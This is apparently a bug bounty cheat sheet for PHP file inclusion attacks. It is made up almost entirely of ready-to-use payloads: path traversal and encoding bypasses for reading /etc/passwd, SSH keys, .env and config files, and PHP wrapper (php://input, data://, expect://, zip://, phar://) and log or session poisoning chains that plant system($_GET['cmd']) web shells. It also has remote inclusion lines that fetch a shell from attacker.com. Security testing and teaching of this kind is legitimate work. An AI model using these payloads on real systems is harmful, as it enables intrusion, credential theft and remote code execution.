Detection Points
Common Vulnerable Parameters
TEXT
page=
file=
include=
path=
doc=
document=
folder=
root=
pg=
style=
pdf=
template=
php_path=
lang=Vulnerable Code Patterns
PHP
include($_GET['page']);
include($_GET['file'] . '.php');
require($user_input);
include_once($path);Basic LFI Payloads
Path Traversal
TEXT
?page=../../../etc/passwd
?page=....//....//....//etc/passwd
?page=..%2f..%2f..%2fetc/passwd
?page=..%252f..%252f..%252fetc/passwd
?page=..\/..\/..\/etc/passwd
?page=....\/....\/....\/etc/passwdNull Byte (PHP < 5.3.4)
TEXT
?page=../../../etc/passwd%00
?page=../../../etc/passwd%00.php
?page=../../../etc/passwd%00.jpgPath Truncation (PHP < 5.3)
TEXT
?page=../../../etc/passwd............[..extend to 4096 chars]PHP Wrappers
php://filter - Read Source Code
TEXT
# Base64 encode (read PHP files without execution)
?page=php://filter/convert.base64-encode/resource=index.php
?page=php://filter/convert.base64-encode/resource=config.php
?page=php://filter/read=convert.base64-encode/resource=../config.php
# ROT13
?page=php://filter/read=string.rot13/resource=index.php
# UTF encoding
?page=php://filter/convert.iconv.utf-8.utf-16/resource=index.php
# Chained filters
?page=php://filter/read=string.toupper|string.rot13/resource=index.phpphp://input - RCE
TEXT
# Requirements: allow_url_include=On
?page=php://input
POST data: <?php system('id'); ?>
# POST request example
POST /vuln.php?page=php://input HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
<?php system($_GET['cmd']); ?>data:// - RCE
TEXT
# Requirements: allow_url_include=On
?page=data://text/plain,<?php system('id'); ?>
?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOyA/Pg==
?page=data:text/plain,<?php echo shell_exec('id'); ?>expect:// - RCE
TEXT
# Requirements: expect extension installed
?page=expect://id
?page=expect://lszip:// - RCE
TEXT
# Create malicious zip
echo '<?php system($_GET["cmd"]); ?>' > shell.php
zip shell.zip shell.php
# Upload and access
?page=zip://uploads/shell.zip%23shell.php&cmd=idphar:// - RCE
TEXT
# Requires ability to upload phar file
?page=phar://uploads/shell.phar/test.txtLog Poisoning
Apache Access Log
TEXT
# Poison User-Agent
GET /vuln.php?page=test HTTP/1.1
User-Agent: <?php system($_GET['cmd']); ?>
# Include the log
?page=/var/log/apache2/access.log&cmd=id
?page=../../../var/log/apache2/access.log&cmd=id
# Common log locations
/var/log/apache2/access.log
/var/log/apache/access.log
/var/log/httpd/access_log
/usr/local/apache/log/access_logApache Error Log
TEXT
# Trigger error with payload
GET /<?php system($_GET['cmd']); ?> HTTP/1.1
# Include error log
?page=/var/log/apache2/error.log&cmd=idSSH Log
TEXT
# Connect with payload as username
ssh '<?php system($_GET["cmd"]); ?>'@target.com
# Include auth log
?page=/var/log/auth.log&cmd=idMail Log
TEXT
# Send email with PHP in subject/body
mail -s "<?php system(\$_GET['cmd']); ?>" www-data@target.com < /dev/null
# Include mail log
?page=/var/log/mail.log&cmd=idProc Environ
TEXT
# Poison User-Agent or Referer
User-Agent: <?php system($_GET['cmd']); ?>
# Include proc/self/environ
?page=/proc/self/environ&cmd=idSession File Poisoning
TEXT
# Store payload in session
GET /set_session.php?name=<?php system($_GET['cmd']); ?> HTTP/1.1
Cookie: PHPSESSID=abc123
# Session file locations
/var/lib/php/sessions/sess_abc123
/tmp/sess_abc123
/var/lib/php5/sess_abc123
# Include session file
?page=/var/lib/php/sessions/sess_abc123&cmd=idUseful Files to Read
Linux
TEXT
/etc/passwd
/etc/shadow (requires root)
/etc/hosts
/etc/hostname
/etc/issue
/proc/self/environ
/proc/self/cmdline
/proc/version
/home/<user>/.ssh/id_rsa
/home/<user>/.bash_history
/root/.bash_history
/var/mail/<user>
~/.ssh/authorized_keysWeb Server Config
TEXT
# Apache
/etc/apache2/apache2.conf
/etc/apache2/sites-available/000-default.conf
/etc/httpd/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
# Nginx
/etc/nginx/nginx.conf
/etc/nginx/sites-available/default
/var/log/nginx/access.log
/var/log/nginx/error.logApplication Files
TEXT
/var/www/html/config.php
/var/www/html/.env
/var/www/html/wp-config.php
/var/www/html/configuration.php # Joomla
/var/www/html/includes/config.phpWindows
TEXT
C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\config\SAM
C:\Windows\system.ini
C:\Windows\win.ini
C:\inetpub\wwwroot\web.config
C:\inetpub\logs\LogFiles\Remote File Inclusion (RFI)
Requirements
TEXT
allow_url_fopen = On
allow_url_include = OnBasic RFI
TEXT
# Host shell.txt containing: <?php system($_GET['cmd']); ?>
?page=http://attacker.com/shell.txt
?page=http://attacker.com/shell.txt&cmd=id
# Bypass extension append (.php)
?page=http://attacker.com/shell.txt?
?page=http://attacker.com/shell.txt%00 # Null byteSMB for Windows
TEXT
?page=\\attacker.com\share\shell.phpFilter Bypass
Encoding
TEXT
# URL encoding
?page=..%2f..%2f..%2fetc%2fpasswd
# Double encoding
?page=..%252f..%252f..%252fetc%252fpasswd
# UTF-8 encoding
?page=..%c0%af..%c0%af..%c0%afetc/passwdWrapper Prefix Bypass
TEXT
# If checking for http/https
?page=HtTp://attacker.com/shell.txt
?page=hTTp://attacker.com/shell.txt
# Alternative wrappers
?page=expect://id
?page=dict://localhost:11211/Directory Bypass
TEXT
# When blocking ../
?page=....//....//....//etc/passwd
?page=..../..../..../etc/passwd
?page=....\/....\/....\/etc/passwd
# When requiring specific directory
?page=/var/www/html/../../../etc/passwdLFI to RCE Paths
| Method | Requirements |
|---|---|
| php://input | allow_url_include=On |
| data:// | allow_url_include=On |
| Log poisoning | Write access to logs |
| Session poisoning | Ability to set session data |
| /proc/self/environ | Readable environ |
| File upload + LFI | Upload capability |
| Zip/Phar wrappers | Upload .zip/.phar files |
Bug Bounty Tips
Testing Strategy
TEXT
1. Identify all file inclusion parameters
2. Test basic path traversal
3. Try null bytes and encoding
4. Test PHP wrappers for source disclosure
5. Attempt log/session poisoning for RCE
6. Combine with file upload if availableHigh-Impact Combination
TEXT
# LFI + File Upload = RCE
1. Upload image with PHP code in EXIF
2. Include uploaded file via LFI
3. Execute code